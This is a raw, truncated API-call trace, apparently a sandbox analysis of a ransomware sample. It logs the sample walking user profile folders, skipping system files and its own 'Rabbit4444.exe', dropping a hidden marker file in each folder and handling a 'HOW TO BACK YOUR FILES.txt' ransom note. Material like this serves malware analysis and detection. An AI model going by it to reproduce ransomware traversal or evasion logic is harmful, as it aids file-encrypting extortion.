lstrcmpiW (lpString1="Gadgets", lpString2="bootmgr") returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="pagefile.sys") returned -1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="boot") returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="ids.txt") returned -1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="NTUSER.DAT") returned -1 [0061.679] lstrcpyW (in: lpString1=0x11cebfa, lpString2="Gadgets" | out: lpString1="Gadgets") returned="Gadgets" [0061.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0061.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x82) returned 0x105610 [0061.679] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122208 | out: ListHead=0x1220c8, ListEntry=0x122208) returned 0x1221a8 [0061.679] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9e2bf1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f90064, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f90064, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="Rabbit4444.exe") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2=".") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="..") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="windows") returned -1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="bootmgr") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="pagefile.sys") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="boot") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="ids.txt") returned 1 [0061.679] lstrcmpiW (lpString1="settings.ini", lpString2="NTUSER.DAT") returned 1 [0061.679] lstrcpyW (in: lpString1=0x11cebfa, lpString2="settings.ini" | out: lpString1="settings.ini") returned="settings.ini" [0061.679] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini", dwFileAttributes=0x0) returned 1 [0061.681] lstrlenW (lpString="settings.ini") returned 12 [0061.681] lstrlenW (lpString="Rabbit4444") returned 10 [0061.681] lstrcmpiW (lpString1="ttings.ini", lpString2="Rabbit4444") returned 1 [0061.681] lstrlenW (lpString=".dll") returned 4 [0061.681] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0061.681] lstrlenW (lpString=".lnk") returned 4 [0061.681] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0061.681] lstrlenW (lpString=".ini") returned 4 [0061.681] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0061.681] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9e2bf1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f90064, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f90064, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 0 [0061.681] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0061.681] lstrcpyW (in: lpString1=0x11cebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.681] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.685] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.685] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.685] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.685] CloseHandle (hObject=0x29c) returned 1 [0061.685] CloseHandle (hObject=0x2a0) returned 1 [0061.686] GetCurrentThreadId () returned 0x2d4 [0061.686] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122208 [0061.686] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0061.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105610 | out: hHeap=0xe0000) returned 1 [0061.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0061.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0061.686] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\" [0061.686] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.BFC0E91B00AE8A0620D3" [0061.686] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.687] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.689] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.690] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.690] CloseHandle (hObject=0x2a0) returned 1 [0061.691] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 64 [0061.691] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.691] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8a984, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee168a0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.691] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.691] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.691] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.691] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.691] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8a984, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee168a0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.691] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.691] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.691] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.691] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.691] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.691] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee168a0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee168a0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.691] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.691] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.691] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee168a0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee168a0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.692] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.692] lstrcpyW (in: lpString1=0x11cec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.692] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.692] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.692] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.692] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.693] CloseHandle (hObject=0x29c) returned 1 [0061.693] CloseHandle (hObject=0x2a0) returned 1 [0061.693] GetCurrentThreadId () returned 0x2d4 [0061.693] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1221a8 [0061.693] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" [0061.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0061.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0061.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" [0061.693] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\" [0061.693] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\.BFC0E91B00AE8A0620D3" [0061.693] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.696] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.699] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.700] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.700] CloseHandle (hObject=0x2a0) returned 1 [0061.700] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned 61 [0061.700] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.700] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6dc3522, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa27e7c13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.700] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.701] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.701] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6dc3522, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa27e7c13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.701] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.701] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.701] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.701] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee18ec18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee18ec18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.701] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.701] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.701] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fc49d4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0xc3b53c8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5fc49d4, ftLastWriteTime.dwHighDateTime=0x1d1a04d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="Rabbit4444.exe") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2=".") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="..") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="windows") returned -1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="bootmgr") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="pagefile.sys") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="boot") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="ids.txt") returned 1 [0061.701] lstrcmpiW (lpString1="TrainedDataStore", lpString2="NTUSER.DAT") returned 1 [0061.701] lstrcpyW (in: lpString1=0x11cec04, lpString2="TrainedDataStore" | out: lpString1="TrainedDataStore") returned="TrainedDataStore" [0061.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x120c90 [0061.701] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122128 | out: ListHead=0x1220c8, ListEntry=0x122128) returned 0x0 [0061.701] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fc49d4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0xc3b53c8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5fc49d4, ftLastWriteTime.dwHighDateTime=0x1d1a04d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 0 [0061.701] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.701] lstrcpyW (in: lpString1=0x11cec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.701] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.703] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.703] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.703] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.703] CloseHandle (hObject=0x29c) returned 1 [0061.703] CloseHandle (hObject=0x2a0) returned 1 [0061.703] GetCurrentThreadId () returned 0x2d4 [0061.704] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122128 [0061.704] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0061.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120c90 | out: hHeap=0xe0000) returned 1 [0061.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0061.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0061.704] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\" [0061.704] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\.BFC0E91B00AE8A0620D3" [0061.704] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.731] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.734] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.735] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.735] CloseHandle (hObject=0x2a0) returned 1 [0061.736] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned 78 [0061.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.736] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fc49d4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0xc3b53c8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.736] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.736] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.736] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.736] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fc49d4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0xc3b53c8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee18ec18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.736] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.736] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.736] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.736] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.736] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.736] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee18ec18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee18ec18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee1db3fe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, 